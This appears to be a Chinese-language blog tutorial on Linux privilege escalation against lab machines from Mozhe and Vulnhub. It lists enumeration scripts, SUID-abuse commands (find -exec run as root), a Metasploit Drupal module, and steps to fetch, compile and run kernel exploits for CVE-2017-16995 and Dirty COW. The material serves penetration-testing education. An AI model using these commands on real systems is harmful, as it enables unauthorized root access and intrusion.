权限提升-Linux脏牛内核漏洞&SUID&信息收集
linux提权自动化脚本利用-4个脚本
两个信息收集
- LinEnum
- https://github.com/rebootuser/LinEnum
- LinEnum-master.zip
- linuxprivchecker
- https://github.com/sleventyeleven/linuxprivchecker
- linuxprivchecker-master.zip
两个漏洞探针
- linux-exploit-suggester
- https://github.com/mzet-/linux-exploit-suggester
- linux-exploit-suggester-master.zip
- linux-exploit-suggester2
- https://github.com/jondonas/linux-exploit-suggester-2
- linux-exploit-suggester-2-master.zip
LinEnum——Linux枚举及权限提升检查工具
#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x LinEnum.sh
./LinEnum.sh
主要检测以下几个大类的信息
- 内核和发行版发布详情
- 系统信息
- 用户信息
- 特权访问
- 环境
- 作业/任务
- 服务
- 一些web服务的版本信息
- 默认/弱凭证
- 搜索
- 平台/软件特定测试
Linuxprivchecker——Linux 权限提升检查脚本
python linuxprivchecker.py
python linuxprivchecker.py -w -o linuxprivchecker.log
linux-exploit-suggester——Linux 提权审计工具
#脚本先上传到目标服务器/tmp目录下(/tmp目录是临时目录,一般是可读写可执行的)
cd /tmp
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
linux-exploit-suggester-2
perl linux-exploit-suggester-2.pl
linux提权suid配合脚本演示
本来是普通用户执行普通程序,但是一旦给了程序suid权限,程序在运行中就会以root 权限执行,从而提升权限
test.sh
原来的权限是-rwxr-xr-x
,当执行chmod u+s test.sh
命令后,它的权限就会变成-rwsr-xr-x
.即使你用普通用户身份运行test.sh
文件,实际上它却是以root权限运行的- SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了
- https://pentestlab.blog/2017/09/25/suid-executables/
已知的可用来提权的程序如下
- nmap
- vim
- find
- bash
- more
- less
- nano
- cp
冰蝎获取shell
排查命令
#可以使用`LinEnum.sh`进行搜索,也可以用命令进行查找
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
- 执行以下命令,确认以root身份运行。即 当我们使用
find pentestlab -exec <命令> \;
的形式运行命令时,使用的是root身份
touch pentestlab
find pentestlab -exec whoami \;
linux提权本地配合内核漏洞演示-Mozhe
上传漏洞探针linux-exploit-suggester2并执行
尝试利用漏洞CVE-2017-16995
上传exp到靶机并执行
gcc 45010.c -o 45010
chmod +x 45010
./45010
id
linux提权脏牛内核漏洞演示-Vulnhub
部署好以后获得ip地址进行扫描
nmap -p- 192.168.50.51
尝试利用Drupal进行突破
search Drupal
use 4
show options
set RHOSTS 192.168.50.51
set rport 1898
run
上传一个漏洞探针脚本
linux-exploit-suggester.sh
尝试利用漏洞
wget https://www.exploit-db.com/download/40847
mv 40847 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
./dcow -s
资源
最后一次更新于2022-05-11 13:51
0 条评论